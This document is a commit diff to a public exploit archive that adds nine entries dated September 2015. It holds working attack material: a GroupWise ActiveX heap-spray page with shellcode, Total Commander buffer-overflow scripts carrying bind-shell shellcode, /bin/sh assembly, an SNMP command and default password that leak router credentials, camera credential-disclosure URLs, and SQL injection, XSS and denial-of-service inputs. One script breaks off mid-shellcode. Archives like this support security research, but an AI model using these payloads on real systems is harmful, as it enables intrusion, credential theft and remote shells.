DB: 2015-09-21

9 new exploits
2015-09-21 05:01:49 +00:00 · 2015-09-21 05:01:49 +00:00 · c6421d54c9
commit c6421d54c9
parent 828e9ae3d0
11 changed files with 640 additions and 2 deletions
--- a/files.csv
+++ b/files.csv
@ -472,7 +472,7 @@ id,file,description,date,author,platform,type,port
 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0
 611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0
 612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0
-616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit (1)",2004-11-07,class101,windows,remote,80
+616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80
 618,platforms/windows/remote/618.c,"Ability Server 2.34 - FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21
 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808
 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25
@ -488,7 +488,7 @@ id,file,description,date,author,platform,type,port
 631,platforms/php/webapps/631.txt,"vBulletin LAST.PHP SQL Injection Vulnerability",2004-11-15,N/A,php,webapps,0
 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0
 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0
-636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (2)",2004-11-16,NoPh0BiA,windows,remote,80
+636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,80
 637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25
 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110
 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0
@ -34535,3 +34535,12 @@ id,file,description,date,author,platform,type,port
 38238,platforms/php/webapps/38238.txt,"PHPWeby Free Directory Script 'contact.php' Multiple SQL Injection Vulnerabilities",2013-01-25,AkaStep,php,webapps,0
 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash PoC",2015-09-18,spyk,windows,dos,0
 38241,platforms/php/webapps/38241.txt,"Pligg CMS 2.0.2 - (load_data_for_search.php) SQL Injection",2015-09-18,jsass,php,webapps,80
 38242,platforms/hardware/remote/38242.txt,"Thomson CableHome Gateway (DWG849) Cable Modem Gateway - Information Exposure",2015-09-19,"Matthew Dunlap",hardware,remote,0
 38243,platforms/windows/local/38243.py,"Total Commander 8.52 - Buffer Overflow (Windows 10)",2015-09-20,VIKRAMADITYA,windows,local,0
 38244,platforms/windows/local/38244.py,"Total Commander 8.52 - Buffer Overflow",2015-09-20,VIKRAMADITYA,windows,local,0
 38245,platforms/hardware/webapps/38245.txt,"ADH-Web Server IP-Cameras - Multiple Vulnerabilities",2015-09-20,"Glaysson dos Santos",hardware,webapps,0
 38246,platforms/php/webapps/38246.txt,"iCart Pro 'section' Parameter SQL Injection Vulnerability",2013-01-25,n3tw0rk,php,webapps,0
 38248,platforms/multiple/remote/38248.txt,"Multiple Hunt CCTV Information Disclosure Vulnerability",2013-01-29,"Alejandro Ramos",multiple,remote,0
 38249,platforms/multiple/dos/38249.txt,"MiniUPnP Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0
 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin 'id' Parameter Cross Site Scripting Vulnerability",2013-01-24,hiphop,php,webapps,0
--- a/platforms/hardware/remote/38242.txt
+++ b/platforms/hardware/remote/38242.txt
@ -0,0 +1,76 @@
 # Exploit Title: Information Exposure via SNMP on Thomson CableHome Gateway
 [MODEL: DWG849] Cable Modem Gateway
 # Google Dork: n/a
 # Date: 09/18/2015
 # Exploit Author: Matt Dunlap
 # Vendor Homepage:
 http://www.technicolor.com/en/solutions-services/connected-home/modems-gateways
 # Software Link: n/a
 # Version: Thomson CableHome Gateway <<HW_REV: 1.0; VENDOR: Thomson; BOOTR:
 2.1.7i; SW_REV: STC0.01.16; MODEL: *DWG849*>>
 # Tested on: Ubuntu 14.04.3
 # CVE : Not reported to vendor (yet)
 Information Exposure via SNMP on Thomson CableHome Gateway [MODEL: DWG849]
 Cable Modem Gateway
 Affected Product:
 Thomson CableHome Gateway <<MODEL: DWG849>> Cable Modem Gateway
 NOTE: The model DWG850-4 is open to the same attack but doesn’t come with
 the remote administration enabled (no web interface, no telnet)
 Severity Rating:
 Important
 Impact:
 Username and password for the user interface as well as wireless network
 keys can be disclosed through SNMP.
 At the time of posting this there are 61,505 results on Shodan for this
 model.
 By default there are 2 open ports: 161 (snmp), 8080 (web administration)
 The default password of 4GIt3M has been set on every unit I’ve tested so far
 Description:
 The Thomson CableHome Gateway DWG849 Cable Modem Gateway product
 specifications include SNMP v2 & v3 under Network Management. The
 management information bases (MIBs) of various device subsystems on the
 DWG849 allows local\remote network users to discover user interface
 credentials and wireless network key values through simple SNMP requests
 for the value of these variables. Given the security authentication in
 SNMPv1 and SNMPv2c do not offer sufficient protection, this increases the
 risk that the values can be disclosed through SNMP using the default
 read-only community “private”.
 Object Identifiers (OIDs):
 Make, Model, Software Version:
 1.3.6.1.2.1.1.1.0
 1.3.6.1.2.1.1.3.0
 Web Interface Username \ Password (DEFAULT: admin \ Uq-4GIt3M)
 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0
 SSID and KEY
 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
 1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
 Guest Network OIDs
 Other OIDs of interest include
 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.33
 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.34
 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.35
 [POC]
 snmpget -t15 -v 2c -c private [host] 1.3.6.1.4.1.4491.2.4.1.1.6.1.1.0
 1.3.6.1.4.1.4491.2.4.1.1.6.1.2.0 1.3.6.1.4.1.4413.2.2.2.1.5.4.1.14.1.3.32
 1.3.6.1.4.1.4413.2.2.2.1.5.4.2.4.1.2.32
 This issue has not been reported to the vendor.
--- a/platforms/hardware/webapps/38245.txt
+++ b/platforms/hardware/webapps/38245.txt
@ -0,0 +1,148 @@
 1. *Advisory Information*
 Title: ADH-Web Server IP-Cameras Improper Access Restrictions
 Date published: 2015-09-19
 Date of last update: 2015-09-19
 Vendors contacted: ADH-Web
 Author: Glaysson dos Santos
 Release mode: User release
 2. *Vulnerability Information*
 Class: Information Exposure [CWE-200]
 Impact: Security bypass
 Remotely Exploitable: Yes
 Locally Exploitable: No
 CVE Name:
 3. *Vulnerabilities*
 3.1 ADH-Web Server IP-Cameras Improper Access Restrictions
 3.1.1 Description
 Due to improper access restriction the ADH-Web (item 4) device [1] allows a
 remote attacker to browse and access arbitrary files from the following
 directorie '/hdd0/logs'. you can also get numerous information
 (important for a fingerprint step) via the parameter "variable" in
 variable.cgi script.
 3.1.2 Vulnerability Details
 Usually this directory can be protected against
 unauthenticated access (401 Unauthorized), though, it can access all files
 directly without requiring authentication.As in the statement below:
 [401]
 . 'http://<target_ip>/hdd0/logs'
        [200]
 . 'http://<target_ip>/hdd0/logs/log.txt'
 Most common logfiles:
 . 'bak.txt
 . 'connect.txt'
 . 'log.txt'
 . 'seclog.log'
 . 'startup.txt'
 . 'DBGLOG.TXT'
 . 'access.txt'
 . 'security.txt'
 3.1.3 Impact
 This could allow a remote attacker to obtain valuable information such as
 access credentials, Network configuration and other sensitive information
 in plain text.
 Another problem identified is an information exposure  via the parameter
 "variable" in variable.cgi script. Knowing some variables can extract a
 reasonable amount of information. For exemplo:
 * DNS
 . 'http://target_ip/variable.cgi?variable=dhcp_dns&slaveip=0.0.0.0'
 * ftp master ftp console credenthials ((the development team said that this
 credential is not used, then why does it exist?):
 . '
 http://target_ip/variable.cgi?variable=console_master_ftpuser&slaveip=0.0.0.0
 '
 . '
 http://target_ip/variable.cgi?variable=console_master_ftppass&slaveip=0.0.0.0
 '
 (although the vast majority of servers have ftp / telnet with anonymous
 access allowed.)
 * alarms
 . 'http://target_ip/variable.cgi?variable=alarm_title&slaveip=0.0.0.0'
 * camconfig
 . 'http://target_ip/variable.cgi?variable=camconfig[0]&slaveip=127.0.0.1'
 (includes, but is not limited to) There are a lot of variables [an audit
 tool is on the way].
 This servers also sends credentials (and other sensitive data) via GET
 parameters
 This is poor practice as the URL is liable to be logged in any number of
 places
 between the customer and the camera. The credentials should be passed in
 the body
 of a POST request (under SSL of course, here is not the case). .
 (Is possible to create, edit and delete users and other configurations in
 this way, dangerous)
 4. *Vulnerable Products and Packages*
   . The following products are affected:
 - SD Advanced Closed IPTV
 - SD Advanced
 - EcoSense
 - Digital Sprite 2
 Other products/models are probably affected too, but they I not checked.
 5. *Vendor Information, Solutions and Workarounds*
 The vendor found that some things are not vulnerabilities (sensitive
 information via GET, for example)
 and others are useless (hardcoded credentials) and others are not yet so
 critical (access to server logs).
 I think that at least this information can assist during an intrusion test,
 as will be shown soon.
 6. *Credits*
 This vulnerability was discovered by Glaysson dos Santos.
 7. *Report Timeline*
 . 2015-08-31:
 Vendor has been notified about the vulnerabilities (without details yet).
 . 2015-09-01:
 Vendor acknowledges the receipt of the email and asks for technical
 details.
 . 2013-09-01:
 A email with technical details is sent to vendor.
 . 2013-09-11:
 Still no response, another email was sent to the Vendor requesting any
 opinion on the reported problems.
 the following points were highlighted in this email:
 * 1. No unauthenticated access [No web pages/URL parameters on the cameras
 should be accessible without credentials.]
 * 2. Credentials (and other sensitive data) via GET parameters
 * 4. Use of hard-coded password
 * 3. no SSL
 . 2013-09-11:
 The vendor reported that the matter was passed on to the team developed
 and that it would contact me the following week (2015-09-14).
 . 2013-09-14:
 The development team responded by passing its consideration of the points
 and
 reported in accordance with this response the impact of these
 vulnerabilities
 is low and are no longer available unauthenticated using recent software
 release (version 10212).
--- a/platforms/multiple/dos/38249.txt
+++ b/platforms/multiple/dos/38249.txt
@ -0,0 +1,11 @@
 source: http://www.securityfocus.com/bid/57602/info
 MiniUPnP is prone to multiple denial-of-service vulnerabilities.
 Attackers can exploit these issues to cause denial-of-service conditions.
 MiniUPnP versions prior to 1.4 are vulnerable. 
 M-SEARCH * HTTP/1.1
 Host:239.255.255.250:1900
 ST:uuid:schemas:device:MX:3< no CRLF > 
--- a/platforms/multiple/remote/38248.txt
+++ b/platforms/multiple/remote/38248.txt
@ -0,0 +1,7 @@
 source: http://www.securityfocus.com/bid/57579/info
 Multiple Hunt CCTV devices are prone to a remote information-disclosure vulnerability.
 Successful exploits will allow attackers to obtain sensitive information, such as credentials, that may aid in further attacks. 
 curl -v http://www.example.com/DVR.cfg | strings |grep -i USER 
--- a/platforms/multiple/remote/38250.html
+++ b/platforms/multiple/remote/38250.html
@ -0,0 +1,248 @@
 source: http://www.securityfocus.com/bid/57657/info
 Novell Groupwise Client is prone to multiple remote code-execution vulnerabilities.
 A remote attacker can leverage this issue to execute arbitrary code within the context of the application. Successful exploits will compromise the application, and possibly, the underlying computer.
 The following versions are vulnerable:
 Versions prior to 8.0.3 Hot Patch 2
 Versions prior to GroupWise 2012 SP1 Hot Patch 1 
 <!--  (c)oded by High-Tech Bridge Security Research Lab  -->
 <!-- Windows XP-SP3 Internet Explorer 8.0 - Dep Disabled -->
 <html>
 <Title>- Novell GroupWise 12.0 InvokeContact method Exploit - </Title>
 <object id=ctrl classid='clsid:{54AD9EC4-BB4A-4D66-AE1E-D6780930B9EF}'></object>
 <script language='javascript'>
 function GyGguPonxZoADbtgXPS() {
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl = function(maxAlloc, heapBase) {
    this.maxAlloc = (maxAlloc ? maxAlloc : 65535);
    this.heapBase = (heapBase ? heapBase : 0x150000);
    this.KJZFzfumaV = "AAAA";
    while (4 + this.KJZFzfumaV.length*2 + 2 < this.maxAlloc) {
        this.KJZFzfumaV += this.KJZFzfumaV;
    }
    this.mem = new Array();
    this.AocZkxOTvEXwFTsIPMSanrManzYrte();
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.mNhbOXqosTNKjGhfj = function(msg) {
    void(Math.atan2(0xbabe, msg));
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.YMQLSZf = function(enable) {
    if (enable == true)
        void(Math.atan(0xbabe));
    else
        void(Math.asin(0xbabe));
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ooWKILTrZUXKEMl = function(msg) {
    void(Math.acos(0xbabe));
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.zoNWUcOOYegFinTDSbOSAAM = function(len) {
    if (len > this.KJZFzfumaV.length)
        throw "Requested zoNWUcOOYegFinTDSbOSAAM string length " + len + ", only " + this.KJZFzfumaV.length + " available";
    return this.KJZFzfumaV.substr(0, len);
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.UWzqrDQwReXOllGssMYEzruQtomLp = function(num, UWzqrDQwReXOllGssMYEzruQtomLp) {
    if (UWzqrDQwReXOllGssMYEzruQtomLp == 0)
        throw "Round argument cannot be 0";
    return parseInt((num + (UWzqrDQwReXOllGssMYEzruQtomLp-1)) / UWzqrDQwReXOllGssMYEzruQtomLp) * UWzqrDQwReXOllGssMYEzruQtomLp;
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.beTBwoiJGBBhwyZg = function(num, width)
 {
    var digits = "0123456789ABCDEF";
    var beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1);
    while (num > 0xF) {
        num = num >>> 4;
        beTBwoiJGBBhwyZg = digits.substr(num & 0xF, 1) + beTBwoiJGBBhwyZg;
    }
    var width = (width ? width : 0);
    while (beTBwoiJGBBhwyZg.length < width)
        beTBwoiJGBBhwyZg = "0" + beTBwoiJGBBhwyZg;
    return beTBwoiJGBBhwyZg;
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.RBRfbU = function(RBRfbU) {
    return unescape("%u" + this.beTBwoiJGBBhwyZg(RBRfbU & 0xFFFF, 4) + "%u" + this.beTBwoiJGBBhwyZg((RBRfbU >> 16) & 0xFFFF, 4));
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.nPdkLCpaz = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (this.mem[tag] === undefined)
        this.mem[tag] = new Array();
    if (typeof arg == "string" || arg instanceof String) {
        this.mem[tag].push(arg.substr(0, arg.length));
    }
    else {
        this.mem[tag].push(this.zoNWUcOOYegFinTDSbOSAAM((arg-6)/2));
    }
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.SWc = function(tag) {
    delete this.mem[tag];
    CollectGarbage();
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.AocZkxOTvEXwFTsIPMSanrManzYrte = function() {
    this.mNhbOXqosTNKjGhfj("Flushing the OLEAUT32 cache");
    this.SWc("oleaut32");
    for (var i = 0; i < 6; i++) {
        this.nPdkLCpaz(32, "oleaut32");
        this.nPdkLCpaz(64, "oleaut32");
        this.nPdkLCpaz(256, "oleaut32");
        this.nPdkLCpaz(32768, "oleaut32");
    }
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.uYiBaSLpjlOJJdhFAb = function(arg, tag) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if (size == 32 || size == 64 || size == 256 || size == 32768)
        throw "Allocation sizes " + size + " cannot be flushed out of the OLEAUT32 cache";
    this.nPdkLCpaz(arg, tag);
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.K = function(tag) {
    this.SWc(tag);
    this.AocZkxOTvEXwFTsIPMSanrManzYrte();
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbTbmzXVnhA = function() {
    this.mNhbOXqosTNKjGhfj("Running the garbage collector");
    CollectGarbage();
    this.AocZkxOTvEXwFTsIPMSanrManzYrte();
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.ZsJjplNR = function(arg, count) {
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++) {
        this.uYiBaSLpjlOJJdhFAb(arg);
        this.uYiBaSLpjlOJJdhFAb(arg, "ZsJjplNR");
    }
    this.uYiBaSLpjlOJJdhFAb(arg);
    this.K("ZsJjplNR");
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.WbjLbPsZ = function(arg, count) {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)
        throw("Maximum WbjLbPsZ block size is 1008 bytes");
    var count = (count ? count : 1);
    for (var i = 0; i < count; i++)
        this.uYiBaSLpjlOJJdhFAb(arg, "WbjLbPsZ");
    this.K("WbjLbPsZ");
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.foURAtIhCeelDtsbOQrWNdbMLDvFP = function(arg)
 {
    var size;
    if (typeof arg == "string" || arg instanceof String)
        size = 4 + arg.length*2 + 2;
    else
        size = arg;
    if ((size & 0xf) != 0)
        throw "Allocation size " + size + " must be a multiple of 16";
    if (size+8 >= 1024)
        throw("Maximum WbjLbPsZ block size is 1008 bytes");
    return this.heapBase + 0x688 + ((size+8)/8)*48;
 }
 GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl.prototype.udIUhjCc = function(shellcode, jmpecx, size) {
    var size = (size ? size : 1008);
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";
    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");
    var udIUhjCc = unescape("%u9090%u7ceb")
    for (var i = 0; i < 124/4; i++)
        udIUhjCc += this.RBRfbU(jmpecx);
    udIUhjCc += unescape("%u0028%u0028") +
              shellcode + heap.zoNWUcOOYegFinTDSbOSAAM((size-138)/2 - shellcode.length);
    return udIUhjCc;
 }
    var heap_obj = new GyGguPonxZoADbtgXPS.fCIgzuiPwtTRcuxDXwnvOKNl(0x10000);
    var payload2 = unescape(
             "%u4242%u4242%u4242%u4242%ucccc%ucccc%ucccc%ucccc%ucccc%u0c40%u0c0c%u0c44%u0c0c%u0c48%u0c0c%ue8fc%u0089%u0000%u8960%u31e5" +
             "%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b" +
             "%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf" +
             "%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b" +
             "%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd" +
             "%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063" +
             "");
    var payload = unescape("%u0c0c%u0c0c%u0003%u0000%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141%u4141");
    var zoNWUcOOYegFinTDSbOSAAM = unescape("%u9090%u9090");
    while (zoNWUcOOYegFinTDSbOSAAM.length < 0x1000) zoNWUcOOYegFinTDSbOSAAM += zoNWUcOOYegFinTDSbOSAAM;
    offset_length = 0x5F6;
    junk_offset = zoNWUcOOYegFinTDSbOSAAM.substring(0, offset_length);
    var shellcode = junk_offset + payload + payload2 + zoNWUcOOYegFinTDSbOSAAM.substring(0, 0x800 - payload2.length - junk_offset.length - payload.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(2, 0x40000 - 0x21);
    for (var i=0; i < 250; i++) {
     heap_obj.uYiBaSLpjlOJJdhFAb(block);
    }
    ctrl.InvokeContact(202116108)
 </script>
 </html>
--- a/platforms/osx/shellcode/38126.c
+++ b/platforms/osx/shellcode/38126.c
@ -66,6 +66,21 @@ start:
    mov		rax, r12				;restore RAX
    syscall
    inc		rsi
    mov 	rax, r12				;restore RAX
    syscall
 	xor     rsi,rsi					;zero out RSI
 	push    rsi						;push NULL on stack
 	mov     rdi, 0x68732f6e69622f2f	;mov //bin/sh string to RDI (reverse)
 	push    rdi						;push rdi to the stack
 	mov     rdi, rsp				;store RSP (points to the command string) in RDI
 	xor     rdx, rdx				;zero out RDX
 	sub		r12b, 0x1f				;RAX = 0x000000000200003b execve
    mov		rax, r12				;restore RAX
    syscall							;trigger syscall
 /*
 $ nasm -f bin bind-shellcode.asm 
 $ hexdump bind-shellcode
--- a/platforms/php/webapps/38246.txt
+++ b/platforms/php/webapps/38246.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/57564/info
 iCart Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
 A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 iCart Pro 4.0.1 is vulnerable; other versions may also be affected. 
 http://www.example.com/forum/icart.php?do=editproduct&productid=19&section=' 
--- a/platforms/php/webapps/38251.txt
+++ b/platforms/php/webapps/38251.txt
@ -0,0 +1,9 @@
 source: http://www.securityfocus.com/bid/57664/info
 The WP-Table Reloaded plugin for WordPress is prone to a cross-site scripting vulnerability.
 An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
 WP-Table Reloaded versions prior to 1.9.4 are vulnerable. 
 http://www.example.com/wp-content/plugins/wp-table-reloaded/js/tabletools/zeroclipboard.swf?id=a\%22%29%29}catch%28e%29{alert%281%29}// 
--- a/platforms/windows/local/38243.py
+++ b/platforms/windows/local/38243.py
@ -0,0 +1,51 @@
 #!/usr/bin/python 
 # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow 
 # AUTHOR: VIKRAMADITYA "-OPTIMUS"
 # Credits: Un_N0n
 # Date of Testing: 19th September 2015
 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
 # Tested On : Windows 10 
 # Steps to Exploit
 # Step 1: Execute this python script
 # Step 2: This script will create a file called time.txt
 # Step 3: Copy the contents of time.txt file
 # Step 4: Now open Total Commander 8.52
 # Step 5: Go To file > Change Attributes.
 # Step 6: In time field paste the contents of time.txt
 # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc 
 file = open('time.txt' , 'wb');
 buffer = "\x90"*265 + "\xfe\x24\x76\x6d" + "\x90"*160                       # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS
 # msfvenom -p windows/shell_bind_tcp -f c  -b '\x00\x0a\x0d'
 buffer += ("\xdb\xcb\xd9\x74\x24\xf4\x5a\x31\xc9\xbe\x97\xf8\xc7\x9d\xb1"
 "\x53\x31\x72\x17\x03\x72\x17\x83\x7d\x04\x25\x68\x7d\x1d\x28"
 "\x93\x7d\xde\x4d\x1d\x98\xef\x4d\x79\xe9\x40\x7e\x09\xbf\x6c"
 "\xf5\x5f\x2b\xe6\x7b\x48\x5c\x4f\x31\xae\x53\x50\x6a\x92\xf2"
 "\xd2\x71\xc7\xd4\xeb\xb9\x1a\x15\x2b\xa7\xd7\x47\xe4\xa3\x4a"
 "\x77\x81\xfe\x56\xfc\xd9\xef\xde\xe1\xaa\x0e\xce\xb4\xa1\x48"
 "\xd0\x37\x65\xe1\x59\x2f\x6a\xcc\x10\xc4\x58\xba\xa2\x0c\x91"
 "\x43\x08\x71\x1d\xb6\x50\xb6\x9a\x29\x27\xce\xd8\xd4\x30\x15"
 "\xa2\x02\xb4\x8d\x04\xc0\x6e\x69\xb4\x05\xe8\xfa\xba\xe2\x7e"
 "\xa4\xde\xf5\x53\xdf\xdb\x7e\x52\x0f\x6a\xc4\x71\x8b\x36\x9e"
 "\x18\x8a\x92\x71\x24\xcc\x7c\x2d\x80\x87\x91\x3a\xb9\xca\xfd"
 "\x8f\xf0\xf4\xfd\x87\x83\x87\xcf\x08\x38\x0f\x7c\xc0\xe6\xc8"
 "\x83\xfb\x5f\x46\x7a\x04\xa0\x4f\xb9\x50\xf0\xe7\x68\xd9\x9b"
 "\xf7\x95\x0c\x31\xff\x30\xff\x24\x02\x82\xaf\xe8\xac\x6b\xba"
 "\xe6\x93\x8c\xc5\x2c\xbc\x25\x38\xcf\xd3\xe9\xb5\x29\xb9\x01"
 "\x90\xe2\x55\xe0\xc7\x3a\xc2\x1b\x22\x13\x64\x53\x24\xa4\x8b"
 "\x64\x62\x82\x1b\xef\x61\x16\x3a\xf0\xaf\x3e\x2b\x67\x25\xaf"
 "\x1e\x19\x3a\xfa\xc8\xba\xa9\x61\x08\xb4\xd1\x3d\x5f\x91\x24"
 "\x34\x35\x0f\x1e\xee\x2b\xd2\xc6\xc9\xef\x09\x3b\xd7\xee\xdc"
 "\x07\xf3\xe0\x18\x87\xbf\x54\xf5\xde\x69\x02\xb3\x88\xdb\xfc"
 "\x6d\x66\xb2\x68\xeb\x44\x05\xee\xf4\x80\xf3\x0e\x44\x7d\x42"
 "\x31\x69\xe9\x42\x4a\x97\x89\xad\x81\x13\xb9\xe7\x8b\x32\x52"
 "\xae\x5e\x07\x3f\x51\xb5\x44\x46\xd2\x3f\x35\xbd\xca\x4a\x30"
 "\xf9\x4c\xa7\x48\x92\x38\xc7\xff\x93\x68")
 buffer += "\x90" *10
 file.write(buffer)
 file.close()
--- a/platforms/windows/local/38244.py
+++ b/platforms/windows/local/38244.py
@ -0,0 +1,55 @@
 #!/usr/bin/python 
 # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow 
 # AUTHOR: VIKRAMADITYA "-OPTIMUS"
 # Credits: Un_N0n
 # Date of Testing: 19th September 2015
 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe
 # Tested On : Windows XP Service Pack 2
 # Steps to Exploit
 # Step 1: Execute this python script
 # Step 2: This script will create a file called time.txt
 # Step 3: Copy the contents of time.txt file
 # Step 4: Now open Total Commander 8.52
 # Step 5: Go To file > Change Attributes.
 # Step 6: In time field paste the contents of time.txt
 # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc 
 file = open('time.txt' , 'w');
 buffer = "\x90"*190
 buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX 
 buffer += "\x90"*(265- len(buffer))
 buffer += "\x47\x47\xf7\x75"                                                                                                    #75F74747   FFE0             JMP EAX
 # bad characters - \x00\x0a\x0d
 # msfvenom -p windows/shell_bind_tcp -f c  -b '\x00\x0a\x0d'
 buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
 "\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11"
 "\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69"
 "\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4"
 "\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30"
 "\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3"
 "\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94"
